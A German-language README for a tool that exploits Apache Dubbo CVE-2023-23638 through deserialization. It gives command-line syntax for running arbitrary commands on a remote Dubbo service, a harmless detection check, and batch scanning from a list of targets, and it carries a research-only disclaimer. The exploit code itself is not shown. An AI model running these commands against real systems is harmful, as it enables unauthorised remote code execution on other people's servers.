
Apache Dubbo (CVE-2023-23638) – Engineering-Praxis zur Ausnutzung der Schwachstelle
Ingenieurspraktiken für die Ausnutzung der Apache-Dubbo-Schwachstelle (CVE-2023-23638), die den gesamten Prozess von der Dienstfindung bis zur Ausnutzung und Rückmeldung (Echo) bei Dubbo 3.x abdecken. Dieses Tool dient ausschließlich der Forschung und dem Lernen. Wir freuen uns über Diskussionen und wertvolle Vorschläge von allen Experten.
Dieses Tool unterstützt die vollständige Ausnutzung von CVE-2023-23638 bei Dubbo 3.x, von der Dienstfindung bis zur Ausnutzung und Rückmeldung (Echo). Es kann auch bei Dubbo 2.x verwendet werden, wobei Dienstname, Methodenname usw. manuell übergeben werden müssen. Zu dieser Schwachstelle habe ich zwei Analyseartikel geschrieben:
Dieses Tool dient nur zu Lernzwecken und berücksichtigt viele praktische Probleme nicht, z. B.:
Wird später weiter aktualisiert
Dieses Projekt wird nicht mehr aktualisiert. Ein umfassenderes Dubbo-Scanning und eine umfassendere Ausnutzung werden später in einem anderen Projekt als Open Source veröffentlicht. Bleiben Sie gespannt!
Ein Dank an y4tacker für die geteilte Idee der nativen Fastjson-Deserialisierung.
Single-URL-Exploit
java -jar CVE-2023-23638.jar TARGET_IP TARGET_PORT COMMAND CHARSET(default UTF-8)
e.g.:
java -jar CVE-2023-23638.jar 127.0.0.1 20880 whoami
Schadensfreie Erkennung für eine einzelne URL
java -jar CVE-2023-23638.jar -s TARGET_IP TARGET_PORT
e.g.:
java -jar CVE-2023-23638.jar -s 127.0.0.1 20880
Batch-Erkennung
1.txt:
127.0.0.1:20880
192.168.1.1:20880
java -jar CVE-2023-23638.jar -f FILE_PATH
e.g.:
java -jar CVE-2023-23638.jar -f 1.txt
Bytecode injizieren

Befehlsausführung

Dieses Tool dient ausschließlich der Schwachstellenforschung und dem Lernen. Wenn Sie die Verfügbarkeit dieses Tools testen möchten, richten Sie bitte selbst eine Zielumgebung ein. Bei der Verwendung dieses Tools zur Erkennung müssen Sie sicherstellen, dass Ihr Handeln den örtlichen Gesetzen und Vorschriften entspricht und Sie über ausreichende Genehmigungen verfügen. Bitte scannen Sie keine nicht autorisierten Ziele. Wenn Sie bei der Verwendung dieses Tools rechtswidrige Handlungen vornehmen, müssen Sie die entsprechenden Konsequenzen selbst tragen; wir übernehmen keinerlei rechtliche oder damit verbundene Haftung.